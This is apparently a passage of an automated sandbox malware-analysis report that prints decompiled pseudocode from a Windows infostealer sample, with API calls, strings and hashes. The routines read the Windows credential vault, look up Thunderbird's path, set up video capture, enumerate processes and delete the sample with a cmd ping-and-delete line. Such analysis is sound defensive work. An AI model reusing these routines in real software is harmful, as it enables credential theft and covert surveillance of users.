• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: recv$send$htons$Startupconnectgethostbynameioctlsocketsocketwsprintf
                                      • String ID: %u.%u.%u.%u
                                      • API String ID: 735718650-1542503432
                                      • Opcode ID: 7d76271cabe4856c4a35d723a52d4599fdeebef6afc0779facdedefa47e939f8
                                      • Instruction ID: ef4dc3b3a6fabb0f19007494a561b2b46bb8ac3c29168bdeca896818d0b94b1c
                                      • Opcode Fuzzy Hash: 7d76271cabe4856c4a35d723a52d4599fdeebef6afc0779facdedefa47e939f8
                                      • Instruction Fuzzy Hash: 9841123122420766E725AA6A8C94FBB72CD9FC0301F000429FD94DA192EA74CD2EC79A
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 80%
                                      			E00252803() {
                                      				char _v8;
                                      				struct _PROCESS_INFORMATION _v24;
                                      				struct _STARTUPINFOA _v92;
                                      				char _v352;
                                      				char _v816;
                                      				char _v817;
                                      				char _v872;
                                      				void* _t63;
                                      				void* _t70;
                                      				void* _t73;
                                      
                                      				_t63 = _t70;
                                      				_t73 = _t63;
                                      				E0025EECF(_t73 + 0x10);
                                      				if( *((intOrPtr*)(_t73 + 0x68)) != 0) {
                                      					TerminateThread( *0x26679c, 0);
                                      				}
                                      				if( *((intOrPtr*)(_t73 + 0x50)) != 0) {
                                      					E0025EFFE(_t73 + 4,  *((intOrPtr*)(_t73 + 8)), _t73 + 0x14, 0x20006, 0);
                                      					E0025345A( &_v8, _t73 + 0x54);
                                      					E0025EEEA(_t73 + 4,  &_v8);
                                      					E00255A2D(_v8);
                                      					E0025EF4C(_t73 + 4);
                                      				}
                                      				E00251052( &_v92, 0, 0x44);
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				GetModuleFileNameA(0,  &_v352, 0x104);
                                      				E0025102C( &_v872, "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q ", 0x37);
                                      				E0025102C( &_v817, "\"", 1);
                                      				E0025102C( &_v816,  &_v352, E002510D5( &_v352));
                                      				E0025102C(E002510D5( &_v352) + 0x38 +  &_v872, "\"", 2);
                                      				CreateProcessA(0,  &_v872, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
                                      				CloseHandle(_v24.hThread);
                                      				CloseHandle(_v24);
                                      				ExitProcess(0);
                                      			}

                                      APIs
                                        • Part of subcall function 0025EECF: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 0025EED6
                                      • TerminateThread.KERNEL32(00000000,?,?), ref: 0025F547
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0025F5B4
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0025F63E
                                      • CloseHandle.KERNEL32(?), ref: 0025F64D
                                      • CloseHandle.KERNEL32(?), ref: 0025F652
                                      • ExitProcess.KERNEL32 ref: 0025F655
                                      Strings
                                      • |F&, xrefs: 0025F5CF
                                      • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 0025F5C2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                      • String ID: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q $|F&
                                      • API String ID: 3630425516-102366707
                                      • Opcode ID: a406dde772b507ffa65b621020e91b686a515cba565a005b459d1add06f0539a
                                      • Instruction ID: 89e0ae671d0fbed9bfdd21c3eb8cc2c7205607f3bb7eb1c549257c7d8937defe
                                      • Opcode Fuzzy Hash: a406dde772b507ffa65b621020e91b686a515cba565a005b459d1add06f0539a
                                      • Instruction Fuzzy Hash: A73193B2810618FBDB01EBA0CC8AEEF777CEB04301F004461BA05A2051DB74AF68CFA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 68%
                                      			E0025FCD9() {
                                      				void* _v8;
                                      				struct _PROCESS_INFORMATION _v24;
                                      				struct _STARTUPINFOA _v100;
                                      				int _t10;
                                      				void* _t23;
                                      				int _t24;
                                      				CHAR* _t26;
                                      
                                      				_v8 = 0;
                                      				_t10 = GetCurrentProcess();
                                      				__imp__IsWow64Process(_t10,  &_v8);
                                      				if(_t10 != 0) {
                                      					if(_v8 == 0) {
                                      						_t10 = E0025FE7E(_t23, __eflags);
                                      						__eflags = _t10;
                                      						if(_t10 != 0) {
                                      							_t24 = _t10;
                                      							goto L6;
                                      						}
                                      					} else {
                                      						_t26 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
                                      						GetWindowsDirectoryA(_t26, 0x104);
                                      						E0025102C( &(_t26[lstrlenA(_t26)]), "\\System32\\cmd.exe", 0x14);
                                      						E00251052( &_v100, 0, 0x44);
                                      						asm("stosd");
                                      						asm("stosd");
                                      						asm("stosd");
                                      						asm("stosd");
                                      						_t10 = CreateProcessA(_t26, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24);
                                      						if(_t10 != 0) {
                                      							Sleep(0x3e8);
                                      							_t24 = _v24.dwProcessId;
                                      							L6:
                                      							return E0025FD9E(_t24);
                                      						}
                                      					}
                                      				}
                                      				return _t10;
                                      			}

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00261382,?,?,00000000), ref: 0025FCEB
                                      • IsWow64Process.KERNEL32(00000000,?,?,00000000), ref: 0025FCF2
                                      • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,?,?,00000000), ref: 0025FD16
                                      • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,?,00000000), ref: 0025FD24
                                      • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014,?,?,00000000), ref: 0025FD32
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0025FD6F
                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 0025FD7E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                      • String ID: \System32\cmd.exe
                                      • API String ID: 3151064845-2003734499
                                      • Opcode ID: 0f794040acf1de6f30c4441e6c9fe9505965b0dbe57bbd6c2cb06c9ca1678904
                                      • Instruction ID: 0b4ea1101fc69a9a3eab2715b7e1313ee5dc21b7db0498104950a7a3fcd04b29
                                      • Opcode Fuzzy Hash: 0f794040acf1de6f30c4441e6c9fe9505965b0dbe57bbd6c2cb06c9ca1678904
                                      • Instruction Fuzzy Hash: C811A2B1A01609BBE7109BF4AE89FAF727C9B05745F004431FF05E6091D6B09D1886A5
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0025ADBE(WCHAR* __ecx, char* __edx, void* __eflags) {
                                      				void* _v8;
                                      				int _v12;
                                      				int _v16;
                                      				short _v536;
                                      				char* _t32;
                                      				WCHAR* _t33;
                                      
                                      				_v12 = 0x104;
                                      				_v16 = 1;
                                      				_t32 = __edx;
                                      				_t33 = __ecx;
                                      				E00251052( &_v536, 0, 0x104);
                                      				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
                                      				lstrcatW( &_v536, _t33);
                                      				if(RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8) != 0) {
                                      					return 0;
                                      				}
                                      				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);
                                      				RegCloseKey(_v8);
                                      				return 1;
                                      			}

                                      APIs
                                      • lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0025ADFA
                                      • lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0025AE08
                                      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,002593CF,?,00000104,00000000), ref: 0025AE21
                                      • RegQueryValueExW.ADVAPI32(002593CF,Path,00000000,?,?,?,?,00000104,00000000), ref: 0025AE3E
                                      • RegCloseKey.ADVAPI32(002593CF,?,00000104,00000000), ref: 0025AE47
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0025ADF4
                                      • thunderbird.exe, xrefs: 0025AE00
                                      • Path, xrefs: 0025AE36
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                      • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                      • API String ID: 3135247354-1374996286
                                      • Opcode ID: 1f9a77826ae03f9503e457a41fa75bdf335a1a95bb3b9cb4594d013c59c85a23
                                      • Instruction ID: 121ed20fe7e4a6de4a33f917bd7f4cf1bbe46e34fba3ff93c1dd740018302572
                                      • Opcode Fuzzy Hash: 1f9a77826ae03f9503e457a41fa75bdf335a1a95bb3b9cb4594d013c59c85a23
                                      • Instruction Fuzzy Hash: 31112E72A4011DFFD7109B94ED4EFEA77BCDB14745F004065BA09E2050E6B09E588B61
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 61%
                                      			E00260500(intOrPtr __ecx, intOrPtr _a4) {
                                      				signed int _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v58;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				void* _v128;
                                      				char _v144;
                                      				intOrPtr _v148;
                                      				char _v216;
                                      				intOrPtr* _t63;
                                      				intOrPtr* _t76;
                                      				intOrPtr* _t80;
                                      				signed int _t82;
                                      				intOrPtr* _t89;
                                      				intOrPtr* _t91;
                                      				intOrPtr* _t92;
                                      				intOrPtr* _t93;
                                      				intOrPtr* _t94;
                                      				intOrPtr* _t95;
                                      				intOrPtr* _t96;
                                      				intOrPtr* _t98;
                                      				signed int _t103;
                                      				intOrPtr* _t115;
                                      				intOrPtr* _t118;
                                      				void* _t121;
                                      
                                      				_v28 = __ecx;
                                      				__imp__CoInitialize(0);
                                      				_v12 = 0;
                                      				_v16 = 0;
                                      				_t118 = 0;
                                      				_v20 = 0;
                                      				_t89 = 0;
                                      				_v24 = 0;
                                      				_t115 = __imp__CoCreateInstance;
                                      				_t63 =  *_t115(0x262560, 0, 1, 0x264854,  &_v24);
                                      				_t91 = _v24;
                                      				if(_t91 == 0) {
                                      					L8:
                                      					_t92 = _v12;
                                      					if(_t92 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t92 + 8))(_t92);
                                      						_v12 = _v12 & 0x00000000;
                                      					}
                                      					L10:
                                      					_t93 = _v16;
                                      					if(_t93 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t93 + 8))(_t93);
                                      						_v16 = _v16 & 0x00000000;
                                      					}
                                      					_t94 = _v20;
                                      					if(_t94 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t94 + 8))(_t94);
                                      						_v20 = _v20 & 0x00000000;
                                      					}
                                      					_t95 = _v24;
                                      					if(_t95 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t95 + 8))(_t95);
                                      						_v24 = _v24 & 0x00000000;
                                      					}
                                      					if(_t118 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t118 + 8))(_t118);
                                      					}
                                      					if(_t89 != 0) {
                                      						_t63 =  *((intOrPtr*)( *_t89 + 8))(_t89);
                                      					}
                                      					__imp__CoUninitialize();
                                      					return _t63;
                                      				}
                                      				_t63 =  *((intOrPtr*)( *_t91))(_t91, 0x262540,  &_v16);
                                      				_t96 = _v16;
                                      				if(_t96 == 0) {
                                      					goto L8;
                                      				}
                                      				 *((intOrPtr*)( *_t96 + 4))(_t96);
                                      				_t63 = E00260831(_a4,  &_v12);
                                      				if(_v12 == 0) {
                                      					goto L10;
                                      				}
                                      				_t63 =  *_t115(0x2625b0, 0, 1, 0x264844,  &_v20);
                                      				_t98 = _v20;
                                      				if(_t98 != 0) {
                                      					 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v12, L"Source");
                                      					_t76 = _v20;
                                      					 *((intOrPtr*)( *_t76 + 0xc))(_t76, _v16, L"Grabber");
                                      					E00251052( &_v144, 0, 0x48);
                                      					_t80 = _v24;
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					asm("movsd");
                                      					 *((intOrPtr*)( *_t80 + 0x10))(_t80,  &_v144);
                                      					_t63 = E0026044E();
                                      					_t118 = _t63;
                                      					if(_t118 != 0) {
                                      						_t63 = E0026046A();
                                      						_t89 = _t63;
                                      						if(_t89 != 0) {
                                      							_t103 = _v20;
                                      							_t63 =  *((intOrPtr*)( *_t103 + 0x2c))(_t103, _t118, _t89);
                                      							if(_t63 >= 0) {
                                      								_t82 = _v24;
                                      								 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v216);
                                      								_t105 = _v148;
                                      								_t113 = _v148 + 0x30;
                                      								E0025102C(_t121 + _v148 + 0x30 - _t105 - 0x74, _v148 + 0x30, 0x28);
                                      								E002602B1( &_v216);
                                      								_t63 = E002608F0(_v28, _t113, _a4, _v64, _v68, _v58);
                                      							}
                                      						}
                                      					}
                                      				}
                                      				goto L8;
                                      			}

                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00260512
                                      • CoCreateInstance.OLE32(00262560,00000000,00000001,00264854,00260041), ref: 0026053F
                                      • CoUninitialize.OLE32 ref: 002606C8
                                        • Part of subcall function 00260831: CoCreateInstance.OLE32(002625A0,00000000,00000001,00264834,?), ref: 0026085F
                                      • CoCreateInstance.OLE32(002625B0,00000000,00000001,00264844,?), ref: 00260590
                                        • Part of subcall function 002602B1: CoTaskMemFree.OLE32(?), ref: 002602BF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                      • String ID: Grabber$Source$vids
                                      • API String ID: 533512943-4200688928
                                      • Opcode ID: 76fa4776a99f7bc113a0ec7360dde162a7cc20ed8aeed5ff18090e4fa5d77938
                                      • Instruction ID: ea35fda9e57289d5a719f65d060e2c00bfb5febdd2753526feb2a7ce33b69797
                                      • Opcode Fuzzy Hash: 76fa4776a99f7bc113a0ec7360dde162a7cc20ed8aeed5ff18090e4fa5d77938
                                      • Instruction Fuzzy Hash: F5514D71A10209AFDB14DFA4C894EAFB7B9EF85701F144459F505AB260CBB1ADA4CF60
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 94%
                                      			E0025A1FF(void* __ecx) {
                                      				struct HINSTANCE__* _t17;
                                      				intOrPtr _t21;
                                      				intOrPtr _t24;
                                      				void* _t27;
                                      				void* _t45;
                                      
                                      				_t27 = __ecx;
                                      				_t45 = __ecx;
                                      				_t17 = LoadLibraryA("vaultcli.dll");
                                      				 *(_t45 + 0xc0) = _t17;
                                      				_t46 = _t17;
                                      				if(_t17 == 0) {
                                      					L7:
                                      					__eflags = 0;
                                      					return 0;
                                      				} else {
                                      					_push(_t27);
                                      					 *((intOrPtr*)(_t45 + 0x8c)) = E0025E907(_t17, "VaultOpenVault", _t46);
                                      					 *((intOrPtr*)(_t45 + 0x90)) = E0025E907( *(_t45 + 0xc0), "VaultCloseVault", _t46);
                                      					_t21 = E0025E907( *(_t45 + 0xc0), "VaultEnumerateItems", _t46);
                                      					_t43 = "VaultGetItem";
                                      					 *((intOrPtr*)(_t45 + 0x94)) = _t21;
                                      					 *((intOrPtr*)(_t45 + 0x98)) = E0025E907( *(_t45 + 0xc0), "VaultGetItem", _t46);
                                      					 *((intOrPtr*)(_t45 + 0x9c)) = E0025E907( *(_t45 + 0xc0), _t43, _t46);
                                      					_t24 = E0025E907( *(_t45 + 0xc0), "VaultFree", _t46);
                                      					 *((intOrPtr*)(_t45 + 0xa0)) = _t24;
                                      					if( *((intOrPtr*)(_t45 + 0x8c)) == 0 ||  *((intOrPtr*)(_t45 + 0x94)) == 0 ||  *((intOrPtr*)(_t45 + 0x90)) == 0 ||  *((intOrPtr*)(_t45 + 0x98)) == 0 || _t24 == 0) {
                                      						goto L7;
                                      					} else {
                                      						return 1;
                                      					}
                                      				}
                                      			}

                                      APIs
                                      • LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0025A207
                                        • Part of subcall function 0025E907: lstrcmpA.KERNEL32(?,0025F9CB,?,open,0025F9CB), ref: 0025E940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoadlstrcmp
                                      • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                      • API String ID: 2493137890-3967309459
                                      • Opcode ID: 6a7988999802bb2f7861f6df104deaf9c44d16e841cf6a88b9448baaa620154e
                                      • Instruction ID: 9288e6db44e14815c231c88ba873186bc63710cfbb18282e72f90d9eeefd6f5c
                                      • Opcode Fuzzy Hash: 6a7988999802bb2f7861f6df104deaf9c44d16e841cf6a88b9448baaa620154e
                                      • Instruction Fuzzy Hash: AD114635A21B41CBDF68AF30981AB6376E1AF41316F01493EDCAEC7745DA30A869CB54
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0025F7D0(void* __ecx) {
                                      				void* _v8;
                                      				int _v12;
                                      				short* _t16;
                                      
                                      				_t16 = L"SOFTWARE\\_rptls";
                                      				if(RegOpenKeyExW(0x80000001, _t16, 0, 0xf003f,  &_v8) != 0) {
                                      					RegCreateKeyExW(0x80000001, _t16, 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12);
                                      				}
                                      				RegSetValueExW(_v8, L"Install", 0, 1, 0x2668a8, lstrlenW(0x2668a8) << 2);
                                      				return RegCloseKey(_v8);
                                      			}

                                      0x0025f7e4
                                      0x0025f7f8
                                      0x0025f80d
                                      0x0025f80d
                                      0x0025f82f
                                      0x0025f842

                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,000F003F,?,00000208,002668A8,?,?,?,?,0025F87F), ref: 0025F7F0
                                      • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?,?,?,?,?,0025F87F), ref: 0025F80D
                                      • lstrlenW.KERNEL32(002668A8,?,?,?,?,0025F87F,?,?,?,?,0025535D,?,00000000,00000000), ref: 0025F819
                                      • RegSetValueExW.ADVAPI32(?,Install,00000000,00000001,002668A8,00000000,?,?,?,?,0025F87F,?,?,?,?,0025535D), ref: 0025F82F
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,0025F87F,?,?,?,?,0025535D,?,00000000,00000000), ref: 0025F838
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateOpenValuelstrlen
                                      • String ID: Install$SOFTWARE\_rptls
                                      • API String ID: 2036214137-3226779556
                                      • Opcode ID: 9b78150fbdda6ef34c394a920685918d6715432e45349bbddadaa34f38652a25
                                      • Instruction ID: 8dc6a1b6f995098f378487a443fe61e9a03fa39a6dbea1f5b6e19767c4b3df38
                                      • Opcode Fuzzy Hash: 9b78150fbdda6ef34c394a920685918d6715432e45349bbddadaa34f38652a25
                                      • Instruction Fuzzy Hash: 7FF06D72500118FFEB209B96EC4DEEB7E7CEBD7795F104069FA09E2010D6A15E58D6B0
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 68%
                                      			E00255AF2() {
                                      				_Unknown_base(*)()* _t2;
                                      
                                      				_t2 = GetProcAddress(LoadLibraryA("USER32.DLL"), "MessageBoxA");
                                      				if(_t2 != 0) {
                                      					 *_t2(0, "A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application", "PureCall", 0x2010);
                                      				}
                                      				ExitProcess(1);
                                      			}
                                      0x00255b03
                                      0x00255b0b
                                      0x00255b1e
                                      0x00255b1e
                                      0x00255b22

                                      APIs
                                      • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00255AF7
                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00255B03
                                      • ExitProcess.KERNEL32 ref: 00255B22
                                      Strings
                                      • PureCall, xrefs: 00255B12
                                      • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 00255B17
                                      • MessageBoxA, xrefs: 00255AFD
                                      • USER32.DLL, xrefs: 00255AF2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp
• Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp
• Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressExitLibraryLoadProcProcess
                                      • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                      • API String ID: 881411216-4134947204
                                      • Opcode ID: e2a9ff1ba1734ce01df35e919a7f3d084cdeb96317f0bcfa722fcd38617640e5
                                      • Instruction ID: 36495816aa28a10a0378e57fc7e9cba28ad2d7e1a27a47a096877d88444cf88b
                                      • Opcode Fuzzy Hash: e2a9ff1ba1734ce01df35e919a7f3d084cdeb96317f0bcfa722fcd38617640e5
                                      • Instruction Fuzzy Hash: 14D0C730394F11E6D55017A46C1EF1535246706F03F008460F709A50D3C5E090BC4539
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 85%
                                      			E0025ECC2(void* __ecx, void* __edx, void* __eflags) {
                                      				char _v8;
                                      				char _v12;
                                      				char _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				signed int _v28;
                                      				intOrPtr _v32;
                                      				int _v36;
                                      				intOrPtr _v40;
                                      				int _v44;
                                      				char _v568;
                                      				long _v596;
                                      				char _v600;
                                      				void* _v604;
                                      				char _v1644;
                                      				intOrPtr _t49;
                                      				int _t54;
                                      				struct tagPROCESSENTRY32W* _t57;
                                      				int _t73;
                                      				int _t77;
                                      				int _t89;
                                      				void* _t91;
                                      				void* _t112;
                                      				void* _t113;
                                      				void* _t115;
                                      				void* _t117;
                                      				signed int _t119;
                                      				void* _t120;
                                      				signed int _t122;
                                      				void* _t123;
                                      				intOrPtr* _t124;
                                      				void* _t125;
                                      
                                      				_t125 = __eflags;
                                      				_t112 = __edx;
                                      				_t91 = __ecx;
                                      				E00251052( &_v600, 0, 0x228);
                                      				_t124 = _t123 + 0xc;
                                      				_v604 = 0x22c;
                                      				_v36 = 0;
                                      				_t49 = 5;
                                      				_v32 = _t49;
                                      				_v40 = _t49;
                                      				E00251683( &_v44, _t125);
                                      				_t113 = CreateToolhelp32Snapshot(2, 0);
                                      				if(_t113 == 0xffffffff) {
                                      					L14:
                                      					E002512BA(_t91, __eflags,  &_v44);
                                      					_t54 = _v44;
                                      					__eflags = _t54;
                                      					if(_t54 != 0) {
                                      						_t119 =  *(_t54 - 4);
                                      						_t115 = _t119 * 0xc + _t54;
                                      						__eflags = _t119;
                                      						if(_t119 != 0) {
                                      							do {
                                      								_t115 = _t115 - 0xc;
                                      								E002513B6(_t115);
                                      								_t119 = _t119 - 1;
                                      								__eflags = _t119;
                                      							} while (_t119 != 0);
                                      						}
                                      					}
                                      				} else {
                                      					_t57 =  &_v604;
                                      					Process32FirstW(_t113, _t57);
                                      					_t127 = _t57;
                                      					if(_t57 != 0) {
                                      						do {
                                      							_v16 = _v596;
                                      							_v12 = 0;
                                      							_v8 = 0;
                                      							E0025312C( &_v12, _t112,  &_v568);
                                      							_t120 = OpenProcess(0x1410, 0, _v596);
                                      							__eflags = _t120 - 0xffffffff;
                                      							if(_t120 == 0xffffffff) {
                                      								E00253264( &_v8, E00253412( &_v28, "-"));
                                      								E00255A2D(_v28);
                                      								_t34 =  &_v28;
                                      								 *_t34 = _v28 & 0x00000000;
                                      								__eflags =  *_t34;
                                      							} else {
                                      								E00251052( &_v1644, 0, 0x410);
                                      								_t124 = _t124 + 0xc;
                                      								_t77 =  &_v1644;
                                      								__imp__GetModuleFileNameExW(_t120, 0, _t77, 0x208);
                                      								__eflags = _t77;
                                      								if(_t77 == 0) {
                                      									E00253264( &_v8, E00253412( &_v24, "-"));
                                      									E00255A2D(_v24);
                                      									_t29 =  &_v24;
                                      									 *_t29 = _v24 & 0x00000000;
                                      									__eflags =  *_t29;
                                      								} else {
                                      									E00253264( &_v8, E00253412( &_v20,  &_v1644));
                                      									E00255A2D(_v20);
                                      									_v20 = _v20 & 0x00000000;
                                      								}
                                      								CloseHandle(_t120);
                                      							}
                                      							_t124 = _t124 - 0xc;
                                      							_t121 = _t124;
                                      							 *_t124 = _v16;
                                      							E0025345A(_t121 + 4,  &_v12);
                                      							E0025345A(_t121 + 8,  &_v8);
                                      							E00251560( &_v44);
                                      							E002513B6( &_v16);
                                      							_t73 = Process32NextW(_t113,  &_v604);
                                      							_push(0);
                                      							_pop(0);
                                      							__eflags = _t73;
                                      						} while (__eflags != 0);
                                      						CloseHandle(_t113);
                                      						goto L14;
                                      					} else {
                                      						CloseHandle(_t113);
                                      						E002512BA(_t91, _t127,  &_v44);
                                      						_t89 = _v44;
                                      						if(_t89 != 0) {
                                      							_t122 =  *(_t89 - 4);
                                      							_t117 = _t122 * 0xc + _t89;
                                      							if(_t122 != 0) {
                                      								do {
                                      									_t117 = _t117 - 0xc;
                                      									E002513B6(_t117);
                                      									_t122 = _t122 - 1;
                                      								} while (_t122 != 0);
                                      							}
                                      						}
                                      					}
                                      				}
                                      				return _t91;
                                      			}
                                      0x0025ecc2
                                      0x0025ecc2
                                      0x0025ecdd
                                      0x0025ecdf
                                      0x0025ece4
                                      0x0025ece7
                                      0x0025ecf4
                                      0x0025ecf9
                                      0x0025ecfa
                                      0x0025ecfd
                                      0x0025ed00
                                      0x0025ed0e
                                      0x0025ed13
                                      0x0025ee9b
                                      0x0025eea1
                                      0x0025eea6
                                      0x0025eea9
                                      0x0025eeab
                                      0x0025eead
                                      0x0025eeb3
